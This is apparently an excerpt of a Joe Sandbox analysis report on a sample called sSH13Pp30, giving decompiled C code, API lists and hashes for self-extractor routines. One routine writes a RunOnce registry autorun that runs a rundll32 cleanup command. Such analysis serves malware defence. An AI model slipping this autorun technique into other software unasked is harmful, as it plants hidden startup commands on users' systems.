                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 000E3671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 3904f7ed0e49426d484115e23d9fd7d85e1855550ea3900f9534098cf8ca753c
                                                                                                                                                                                                      • Instruction ID: 23e9650fe1425e52a3881e6e181dea030e44ef98576712ff89fa7746cf3d8cfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3904f7ed0e49426d484115e23d9fd7d85e1855550ea3900f9534098cf8ca753c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1631A8712402C0BFE7601F36AC8DE6A3EA5E7CAF01F108529F715BE2B1CA799900CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E000E4224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E000E44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xe88c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xe87a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xe8598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E000E4200;
                                                                                                                                                                                                      					_v28 = 0xe88c0;
                                                                                                                                                                                                      					 *0xea288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xea288(_t32, 0xe88c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xe88c0 != 0) {
                                                                                                                                                                                                      							E000E1680(0xe87a0, 0x104, 0xe88c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xea288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xe87a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xe88c0);
                                                                                                                                                                                                      					_t61 = 0xe88c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xe88c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xe88c0; // 0x1d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xe88c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xe88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x000e4234
                                                                                                                                                                                                      0x000e423c
                                                                                                                                                                                                      0x000e4240
                                                                                                                                                                                                      0x000e43b2
                                                                                                                                                                                                      0x000e43b7
                                                                                                                                                                                                      0x000e43c0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e43c5
                                                                                                                                                                                                      0x000e424c
                                                                                                                                                                                                      0x000e4252
                                                                                                                                                                                                      0x000e4257
                                                                                                                                                                                                      0x000e43a4
                                                                                                                                                                                                      0x000e43a5
                                                                                                                                                                                                      0x000e43ab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e43ab
                                                                                                                                                                                                      0x000e4263
                                                                                                                                                                                                      0x000e4269
                                                                                                                                                                                                      0x000e426e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e427a
                                                                                                                                                                                                      0x000e4280
                                                                                                                                                                                                      0x000e4285
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e428d
                                                                                                                                                                                                      0x000e4293
                                                                                                                                                                                                      0x000e42e6
                                                                                                                                                                                                      0x000e42e9
                                                                                                                                                                                                      0x000e42ef
                                                                                                                                                                                                      0x000e42f4
                                                                                                                                                                                                      0x000e42f7
                                                                                                                                                                                                      0x000e4300
                                                                                                                                                                                                      0x000e4307
                                                                                                                                                                                                      0x000e430e
                                                                                                                                                                                                      0x000e4315
                                                                                                                                                                                                      0x000e431c
                                                                                                                                                                                                      0x000e4322
                                                                                                                                                                                                      0x000e4326
                                                                                                                                                                                                      0x000e432d
                                                                                                                                                                                                      0x000e432d
                                                                                                                                                                                                      0x000e432f
                                                                                                                                                                                                      0x000e4334
                                                                                                                                                                                                      0x000e4343
                                                                                                                                                                                                      0x000e4349
                                                                                                                                                                                                      0x000e434d
                                                                                                                                                                                                      0x000e4354
                                                                                                                                                                                                      0x000e4354
                                                                                                                                                                                                      0x000e435d
                                                                                                                                                                                                      0x000e436e
                                                                                                                                                                                                      0x000e436e
                                                                                                                                                                                                      0x000e437d
                                                                                                                                                                                                      0x000e4383
                                                                                                                                                                                                      0x000e4387
                                                                                                                                                                                                      0x000e438e
                                                                                                                                                                                                      0x000e438e
                                                                                                                                                                                                      0x000e4387
                                                                                                                                                                                                      0x000e4391
                                                                                                                                                                                                      0x000e4399
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4295
                                                                                                                                                                                                      0x000e429f
                                                                                                                                                                                                      0x000e42a5
                                                                                                                                                                                                      0x000e42aa
                                                                                                                                                                                                      0x000e42aa
                                                                                                                                                                                                      0x000e42ad
                                                                                                                                                                                                      0x000e42ad
                                                                                                                                                                                                      0x000e42af
                                                                                                                                                                                                      0x000e42b0
                                                                                                                                                                                                      0x000e42b6
                                                                                                                                                                                                      0x000e42c2
                                                                                                                                                                                                      0x000e42c8
                                                                                                                                                                                                      0x000e42ce
                                                                                                                                                                                                      0x000e42e4
                                                                                                                                                                                                      0x000e42e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e42ce

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 000E4236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 000E424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 000E4263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 000E427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,000E88C0,?,00000001), ref: 000E429F
                                                                                                                                                                                                      • CharPrevA.USER32(000E88C0,001D1181,?,00000001), ref: 000E42C2
                                                                                                                                                                                                      • CharPrevA.USER32(000E88C0,00000000,?,00000001), ref: 000E42D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000E4391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000E43A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 9dfdbe39d934d3eaabdf4dfa0a02d19a04c3aeec774f78ab6f31257d325e784f
                                                                                                                                                                                                      • Instruction ID: b4e746f8e18da19abde5f7154485174d90fbe905b8da2c8cdf0672719e45fa6b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dfdbe39d934d3eaabdf4dfa0a02d19a04c3aeec774f78ab6f31257d325e784f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3412974A002C0AFE7119F76DCC49AEBFB4EB49744F444069EA45BB251CF788D01C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E000E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E000E658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E000E658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xe1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E000E1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      0x000e2773
                                                                                                                                                                                                      0x000e277e
                                                                                                                                                                                                      0x000e2785
                                                                                                                                                                                                      0x000e278a
                                                                                                                                                                                                      0x000e278d
                                                                                                                                                                                                      0x000e2790
                                                                                                                                                                                                      0x000e2792
                                                                                                                                                                                                      0x000e2798
                                                                                                                                                                                                      0x000e279d
                                                                                                                                                                                                      0x000e28b2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e27a3
                                                                                                                                                                                                      0x000e27a3
                                                                                                                                                                                                      0x000e27af
                                                                                                                                                                                                      0x000e27c2
                                                                                                                                                                                                      0x000e27c8
                                                                                                                                                                                                      0x000e27cd
                                                                                                                                                                                                      0x000e27d5
                                                                                                                                                                                                      0x000e28b7
                                                                                                                                                                                                      0x000e28b9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e27db
                                                                                                                                                                                                      0x000e27dd
                                                                                                                                                                                                      0x000e28aa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e27e3
                                                                                                                                                                                                      0x000e27e3
                                                                                                                                                                                                      0x000e27ec
                                                                                                                                                                                                      0x000e27f8
                                                                                                                                                                                                      0x000e2803
                                                                                                                                                                                                      0x000e280b
                                                                                                                                                                                                      0x000e2831
                                                                                                                                                                                                      0x000e28c3
                                                                                                                                                                                                      0x000e28c9
                                                                                                                                                                                                      0x000e28cd
                                                                                                                                                                                                      0x000e2837
                                                                                                                                                                                                      0x000e285a
                                                                                                                                                                                                      0x000e285c
                                                                                                                                                                                                      0x000e2865
                                                                                                                                                                                                      0x000e2892
                                                                                                                                                                                                      0x000e2895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2867
                                                                                                                                                                                                      0x000e2878
                                                                                                                                                                                                      0x000e288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e287a
                                                                                                                                                                                                      0x000e2880
                                                                                                                                                                                                      0x000e2885
                                                                                                                                                                                                      0x000e2897
                                                                                                                                                                                                      0x000e2899
                                                                                                                                                                                                      0x000e2899
                                                                                                                                                                                                      0x000e2878
                                                                                                                                                                                                      0x000e2865
                                                                                                                                                                                                      0x000e28a0
                                                                                                                                                                                                      0x000e28bf
                                                                                                                                                                                                      0x000e28c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e28c1
                                                                                                                                                                                                      0x000e2831
                                                                                                                                                                                                      0x000e27dd
                                                                                                                                                                                                      0x000e27d5
                                                                                                                                                                                                      0x000e28e5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(B7C20988,00000000,00000000,00000000), ref: 000E27A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 000E27B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 000E27BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E28A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000E28AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E28B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000E27E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: 636706413ec252f421ccf2d0f6456d4ac65ee4d5d324f6074bef9591d2a84066
                                                                                                                                                                                                      • Instruction ID: ec9d4fbd372a6fdc3fc0a2a26ecafe10f3706ae62d1537e41dec9cfda9d960ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 636706413ec252f421ccf2d0f6456d4ac65ee4d5d324f6074bef9591d2a84066
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6241F571A001ACAFEB249B659C85AFE7BBCEF59700F0040A9F549F2101CB749EC58FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E000E2267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0xe8530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E000E658A( &_v268, 0x104, 0xe1140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      							E000E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x000e2272
                                                                                                                                                                                                      0x000e2277
                                                                                                                                                                                                      0x000e2279
                                                                                                                                                                                                      0x000e2283
                                                                                                                                                                                                      0x000e2289
                                                                                                                                                                                                      0x000e22ab
                                                                                                                                                                                                      0x000e22b1
                                                                                                                                                                                                      0x000e22c4
                                                                                                                                                                                                      0x000e22e0
                                                                                                                                                                                                      0x000e22e6
                                                                                                                                                                                                      0x000e22f5
                                                                                                                                                                                                      0x000e230d
                                                                                                                                                                                                      0x000e231c
                                                                                                                                                                                                      0x000e231c
                                                                                                                                                                                                      0x000e2321
                                                                                                                                                                                                      0x000e233a
                                                                                                                                                                                                      0x000e2342
                                                                                                                                                                                                      0x000e2348
                                                                                                                                                                                                      0x000e234b
                                                                                                                                                                                                      0x000e234c
                                                                                                                                                                                                      0x000e234c
                                                                                                                                                                                                      0x000e234e
                                                                                                                                                                                                      0x000e234f
                                                                                                                                                                                                      0x000e236e
                                                                                                                                                                                                      0x000e236e
                                                                                                                                                                                                      0x000e237a
                                                                                                                                                                                                      0x000e2380
                                                                                                                                                                                                      0x000e2380
                                                                                                                                                                                                      0x000e2381
                                                                                                                                                                                                      0x000e2381
                                                                                                                                                                                                      0x000e238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000E22A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 000E22D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E22F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 000E236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000E237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000E232D
                                                                                                                                                                                                      • wextract_cleanup2, xrefs: 000E227C, 000E22CD, 000E2363
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 000E2299
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E2321
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
